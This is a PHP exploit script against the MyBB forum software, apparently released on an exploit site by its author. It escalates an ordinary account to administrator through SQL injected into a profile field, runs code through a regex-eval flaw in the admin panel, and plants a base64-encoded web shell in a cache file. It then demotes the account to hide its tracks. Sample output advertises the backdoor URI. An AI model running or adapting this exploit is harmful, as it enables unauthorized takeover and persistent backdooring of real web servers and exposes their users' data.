<?PHP /*
Someone decided to contact mybb's staff informing about this vulnerability with the obvious result that this will not work anymore. Fucking moron.
I'm releasing a non-finished version of the exploit. No help, PoC and with the necessity of --admindir flag. Going to update it in the next days. For historical reason, i'm leaving the original title, but note that is <= 1.4.6
paradox@d3b14n:~/Files/Exploit-Pocs/My_Exploit/Remote/Mybb$ php myBBtomilw0rm.php -u anybody -p qwerty -t http://localhost/web/mybb/Upload/ --admindir /admin/ [.] Initialing. [+] Logged in. [+] my_post_key variable found. [+] Turned On mybb's invisible mode. [+] Sql code injected. You're now admin. [+] Admindir found (or --admindir is used): /admin/. [+] Admin sid Found: 824e26b4221673a0f213c37f87b9ccd7 [+] Site correctly backdoored. [+] Sql code injected. You're now user. [+] Backdoor URI: http://localhost/web/mybb/Upload//cache/themes/themes.php All Done. The:Paradox hopes you used this exploit exclusively for your own fun and you enjoyed it. Have a nice day :P
For the curious people: http://mybboard.it/forum/thread-3623.html
Mybb <= 1.4.4 Remote Code Execution through Sql Injection Exploit
Discovered: About 4 days before the exploit was coded. Coded: 03-03-2009 Author: The:Paradox Release: Not yet.
No php.ini setting can stop us ! =O A user (not email confirmed too) is needed.
Keep private or your keyboard will blew up.
$mybb = new maibibi2;
class maibibi2 {
function __construct () {
$this->user = $this->get_argv('-u'); $this->pass = $this->get_argv('-p'); $this->target = $this->get_argv('-t'); $this->admindir = $this->get_argv('--admindir'); $this->oa2u = $this->get_argv('--onlyadmin2user');
$this->ip = ''; $this->ua = 'Mozilla 5.0'; $this->bckdr = '/cache/themes/themes.php';
if ($this->get_argv('--help') !== False || $this->get_argv('-h') !== False) $this->help(); if (!$this->user || !$this->pass) die ("You have to insert User/Password\r\nUse --help or -h for more informations.\r\n"); if (!$this->target) die ("You have to insert Target\r\nUse --help or -h for more informations.\r\n"); $this->http(); $this->init();
function help () {
die ("Under Construction\r\n");
function get_argv ($what) { global $argv;
if (!$n = array_search($what, $argv)) return False; return $argv[$n+1]; }
function init () {
set_time_limit(0); // about 30 seconds left? Be serious.
echo "[.] Initialing.\r\n";
if (!$this->mybbuser = $this->ilovecookies ()) die ("Incorrect credentials.\r\n");
echo "[+] Logged in.\r\n";
if (!$this->mypostkey = $this->getmypostkey()) die ("My_Post_Key Not Found.\r\n");
echo "[+] my_post_key variable found.\r\n";
echo "[+] Turned On mybb's invisible mode.\r\n";
echo "[+] Sql code injected. You're now admin.\r\n";
if (!$this->admindir && !$this->admindir = $this->findadmindir()) die ("Unable to find admin Dir.\r\nWhatever it's possible your user is currently an administrator.\r\nIf you know admin dir path, you may use --admindir\r\n");
echo "[+] Admindir found (or --admindir is used): {$this->admindir}.\r\n";
if (!$this->adminsid = $this->loginadmin()) die ("[-] Unable to login as admin.\r\nWhatever it's possible your user is currently an administrator.\r\n"); echo "[+] Admin sid Found: {$this->adminsid}\r\n"; #$this->writabledirs(); $this->rce (); if (!$this->checkrce ()) die ("Unable to Execute PHP Code.\r\nWhatever it's possible your user is currently an administrator.\r\n");
echo "[+] Site correctly backdoored.\r\n";
echo "[+] Sql code injected. You're now user.\r\n"; echo "[+] Backdoor URI: {$this->target}{$this->bckdr}\r\n"; echo "All Done. The:Paradox hopes you used this exploit exclusively for your own fun and you enjoyed it.\r\nHave a nice day :P\r\n\r\n";
function ilovecookies () { $this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua); $this->postdata = array ('username' => $this->user, 'password' => $this->pass, 'submit' => 'Login', 'action' => 'do_login'); $rsp = $this->post ("{$this->target}/member.php"); if (!preg_match_all ('~mybbuser=(.+?);~',$rsp,$res)) return False;
return $res[1][0];
function getmypostkey () {
$this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua, 'Referer' => "{$this->target}/member.php", 'Cookie' => "mybbuser={$this->mybbuser};"); $rsp = $this->get ("{$this->target}/usercp.php?action=profile");
if (!preg_match_all ('~name="my_post_key" value="(.+?)" />~',$rsp,$res)) return False;
return $res[1][0];
function hidemefromonlinelist()
{ $this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua, 'Referer' => "{$this->target}/usercp.php?action=profile", 'Cookie' => "mybbuser={$this->mybbuser};"); $this->postdata = array ('my_post_key' => $this->mypostkey, 'invisible' => '1', 'action' => 'do_options', 'regsubmit' => 'Update+Options'); $rsp = $this->post ("{$this->target}/member.php"); }
function user2admin ()
$this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua, 'Referer' => "{$this->target}/usercp.php?action=profile", 'Cookie' => "mybbuser={$this->mybbuser};"); $this->postdata = array ('my_post_key' => $this->mypostkey, 'invisible' => '1', 'bday1' => '', 'bday2' => '', 'bday3' => '', 'website' => 'http%3A%2F%2F', 'profile_fields%5Bfid3%5D' => 'Undisclosed', 'profile_fields%5Bfid2%5D' => 'Undisclosed', 'profile_fields%5Bfid1%5D' => 'Undisclosed', 'usertitle' => '', 'icq' => '', 'aim' => '', 'msn' => '', 'yahoo' => '', 'away' => '0', 'awayreason' => '', 'awayday' => '', 'awaymonth' => '', 'awayyear' => '', 'birthdayprivacy' => "all', usergroup=4, email='pr3sident@whit3house.gov',regip='', longregip='1334595923', lastip='', longlastip='", 'action' => 'do_profile', 'regsubmit' => '1');
$rsp = $this->post ("{$this->target}/usercp.php");
} function findadmindir () {
$this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua, 'Referer' => "{$this->target}/usercp.php?action=profile", 'Cookie' => "mybbuser={$this->mybbuser};"); $rsp = $this->get("{$this->target}/index.php");
if (!preg_match_all ("~<!-- start: header_welcomeblock_member_admin --> — <a href=\"{$this->target}(.+?)/index.php\">~",$rsp,$res)) return False;
return $res[1][0];
function loginadmin ()
{ $this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua, 'Referer' => "{$this->target}/usercp.php?action=profile", 'Cookie' => "mybbuser={$this->mybbuser};"); $this->postdata = array ('username' => $this->user, 'password' => $this->pass, 'do' => 'login');
$rsp = $this->post ("{$this->target}/{$this->admindir}/index.php"); if (!preg_match_all ('~adminsid=(.+?);~',$rsp,$res)) return False;
return $res[1][0]; }
function writabledirs () { $this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua, 'Referer' => "{$this->target}/{$this->admindir}/index.php?", 'Cookie' => "mybbuser={$this->mybbuser}; adminsid={$this->adminsid};"); $this->get ("{$this->target}/{$this->admindir}/index.php?module=tools") ;
function rceOld ()
//edits inc/functions.php (original one)
$this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua, 'X-Requested-With' => 'XMLHttpRequest', 'Referer' => "{$this->target}/{$this->admindir}/index.php?module=config/mycode&action=edit&cid=1", 'Cookie' => "mybbuser={$this->mybbuser}; adminsid={$this->adminsid};"); $this->postdata = array ('my_post_key' => $this->mypostkey, 'o_o' => 'phpinfo();', 'regex' => '(.*%3F)#e%00', 'replacement' => 'die(eval(stripslashes($_REQUEST[\'o_o\'])));', 'test_value' => 'XoD');
$rsp = $this->post ("{$this->target}/{$this->admindir}/index.php?module=config/mycode&action=xmlhttp_test_mycode");
function rce ()
$this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua, 'X-Requested-With' => 'XMLHttpRequest', 'Referer' => "{$this->target}/{$this->admindir}/index.php?module=config/mycode&action=edit&cid=1", 'Cookie' => "mybbuser={$this->mybbuser}; adminsid={$this->adminsid};"); $this->postdata = array ('my_post_key' => $this->mypostkey, 'o_o' => 'JGZwID0gZm9wZW4oJF9SRVFVRVNUWydmaWxlJ10sICdhJyk7DQpmd3JpdGUoJGZwLCAnPD9QSFAgaWYgKGlzc2V0KCRfUkVRVUVTVFt4XSkpIGV2YWwoc3RyaXBzbGFzaGVzKCRfUkVRVUVTVFt4XSkpOyA/PicpOw0KZmNsb3NlKCRmcCk7', 'regex' => '(.*%3F)#e%00', 'replacement' => 'die(eval(base64_decode($_REQUEST[\'o_o\'])));', 'test_value' => 'XoD', 'file' => "../{$this->bckdr}");
$rsp = $this->post ("{$this->target}/{$this->admindir}/index.php?module=config/mycode&action=xmlhttp_test_mycode");
function admin2user () {
$this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua, 'Referer' => "{$this->target}/usercp.php?action=profile", 'Cookie' => "mybbuser={$this->mybbuser};"); $this->postdata = array ('my_post_key' => $this->mypostkey, 'invisible' => '1', 'bday1' => '', 'bday2' => '', 'bday3' => '', 'website' => 'http%3A%2F%2F', 'profile_fields%5Bfid3%5D' => 'Undisclosed', 'profile_fields%5Bfid2%5D' => 'Undisclosed', 'profile_fields%5Bfid1%5D' => 'Undisclosed', 'usertitle' => '', 'icq' => '', 'aim' => '', 'msn' => '', 'yahoo' => '', 'away' => '0', 'awayreason' => '', 'awayday' => '', 'awaymonth' => '', 'awayyear' => '', 'birthdayprivacy' => "all', usergroup=2, email='pr3sident.whit3house@gmail.com',regip='', longregip='1334595923', lastip='', longlastip='", 'action' => 'do_profile', 'regsubmit' => '1');
$rsp = $this->post ("{$this->target}/usercp.php");
function checkrce_old ()
{ $this->header = array ('client-ip' => $this->ip ,'Cookie' => 'x=print \'.:31337:.\'%3B;'); $rsp = $this->get ("{$this->target}/{$this->admindir}/inc/functions.php?");
if (!strstr($rsp,'.:31337:.')) return False; else return True;
function checkrce ()
{ $this->header = array ('client-ip' => $this->ip ,'Cookie' => 'x=print \'.:31337:.\'%3B;'); $rsp = $this->get ("{$this->target}/{$this->bckdr}");
if (!strstr($rsp,'.:31337:.')) return False; else return True;
function http ($port = 80, $header = array(), $post = array(), $timeout = 30) {
$this->port = $port; $this->timeout = $timeout; $this->header = $header; $this->postdata = $post; }
function get ($url) { $this->url = parse_url($url); $this->packet = array();
$this->packet[] = "GET {$this->url['path']}?{$this->url['query']}{$this->url['fragment']} HTTP/1.1"; $this->packet[] = "Host: {$this->url['host']}";
foreach ($this->header as $header => $value) { $this->packet[] = "$header: $value"; } $this->packet[] = "\r\n\r\n"; $this->packet = implode ("\r\n",$this->packet);
return $this->conn(); }
function post ($url) { $this->url = parse_url($url);
$this->packet = array(); $this->postcontent = '';
$this->packet[] = "POST {$this->url['path']}?{$this->url['query']}{$this->url['fragment']} HTTP/1.1"; $this->packet[] = "Host: {$this->url['host']}";
foreach ($this->header as $header => $value) { $this->packet[] = "$header: $value"; } foreach ($this->postdata as $post => $value) { if ($this->postcontent != '') $this->postcontent .= '&'; $this->postcontent .= "$post=$value"; } $this->packet[] = 'Content-Type: application/x-www-form-urlencoded'; $this->packet[] = "Content-Length: ".strlen($this->postcontent)."\r\n"; $this->packet[] = $this->postcontent;
$this->packet = implode ("\r\n",$this->packet);
return $this->conn(); }
function conn() { if (!isset($this->url['port'])) $this->url['port'] = $this->port;
$sk = fsockopen ($this->url['host'], $this->url['port'], $eno, $estr, $this->timeout);
if (!is_resource($sk)) return "[-] Fsockopen Failed! Error: ".$estr." [".$eno."]" ;
else {
fputs($sk, $this->packet); $rsp = ""; while (!feof($sk)) { $rsp .= fgets ($sk, 1024); } }
fclose($sk); return $rsp; }